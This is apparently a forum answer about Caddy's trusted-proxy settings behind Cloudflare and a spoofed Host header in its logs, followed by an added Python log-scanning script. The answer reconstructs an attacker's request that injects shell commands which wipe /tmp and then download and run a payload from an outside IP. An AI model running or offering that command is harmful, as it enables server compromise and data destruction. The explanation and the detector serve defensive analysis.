You probably need to add this:
client_ip_headers CF-Connecting-IP
Inside your config, it should look something like this:
servers {
    trusted_proxies cloudflare {
        interval 12h
        timeout 15s
    }
    client_ip_headers CF-Connecting-IP
}
There are two things going on in that log:
- Caddy redirects HTTP to HTTPS by default.
- Someone is spoofing the Host header. A normal browser wouldn’t add :80 to the Host header for HTTP (just like it wouldn’t add :443 for HTTPS).
So what’s likely happening is someone is sending a request like this, with a fake Host header:
curl 'http://IP_ADDRESS_OF_THE_SERVER/shell?cd+/tmp;rm+-rf+*;wget+45.90.12.71/jaws;sh+/tmp/jaws' -H 'Host: 127.0.0.1:80'
Caddy receives that and issues an HTTP 308 redirect to:
Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+45.90.12.71/jaws;sh+/tmp/jaws
That’s the only case I can think of where Caddy would log HTTP traffic with this:
"host": "127.0.0.1:80",
including the port number :80 in the host field.
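
One way to hunt for this pattern in Caddy's JSON access logs, as an added example that is not part of the original post: it flags entries whose logged host carries the scheme's default port or is an IP literal. The sample lines are constructed, and the field layout (request.host, request.remote_ip, a request.tls object on HTTPS requests) is an assumption about the log format.

```python
import ipaddress
import json

# Constructed sample lines; the field layout is an assumed Caddy JSON access log shape.
SAMPLE_LOG = """\
{"request":{"remote_ip":"203.0.113.7","host":"127.0.0.1:80","uri":"/shell"},"status":308}
{"request":{"remote_ip":"198.51.100.20","host":"example.com","uri":"/"},"status":308}
{"request":{"remote_ip":"198.51.100.21","host":"example.com","uri":"/","tls":{}},"status":200}
{"request":{"remote_ip":"203.0.113.9","host":"example.com:443","uri":"/","tls":{}},"status":200}
"""

def split_host(host):
    """Split a Host value into (name, port or None), handling [IPv6]:port."""
    if host.startswith("["):
        name, _, rest = host[1:].partition("]")
        return name, rest[1:] if rest.startswith(":") else None
    name, sep, port = host.rpartition(":")
    return (name, port) if sep and port.isdigit() else (host, None)

def host_anomalies(entry):
    """Return the reasons a logged Host value looks spoofed or scanner-generated."""
    req = entry.get("request", {})
    name, port = split_host(req.get("host", ""))
    default_port = "443" if "tls" in req else "80"  # assumption: tls key only on HTTPS
    reasons = []
    if port == default_port:
        # Browsers omit the scheme's default port from the Host header.
        reasons.append("explicit default port :" + port)
    try:
        ip = ipaddress.ip_address(name)
        reasons.append("loopback host" if ip.is_loopback else "IP-literal host")
    except ValueError:
        pass  # a regular hostname
    return reasons

def scan(log_text):
    """Return (remote_ip, host, reasons) for every suspicious log line."""
    findings = []
    for line in log_text.splitlines():
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip blank or non-JSON lines
        reasons = host_anomalies(entry) if isinstance(entry, dict) else []
        if reasons:
            req = entry["request"]
            findings.append((req.get("remote_ip"), req.get("host"), reasons))
    return findings
```

Pass the contents of an access log to scan() to list the requests worth a closer look.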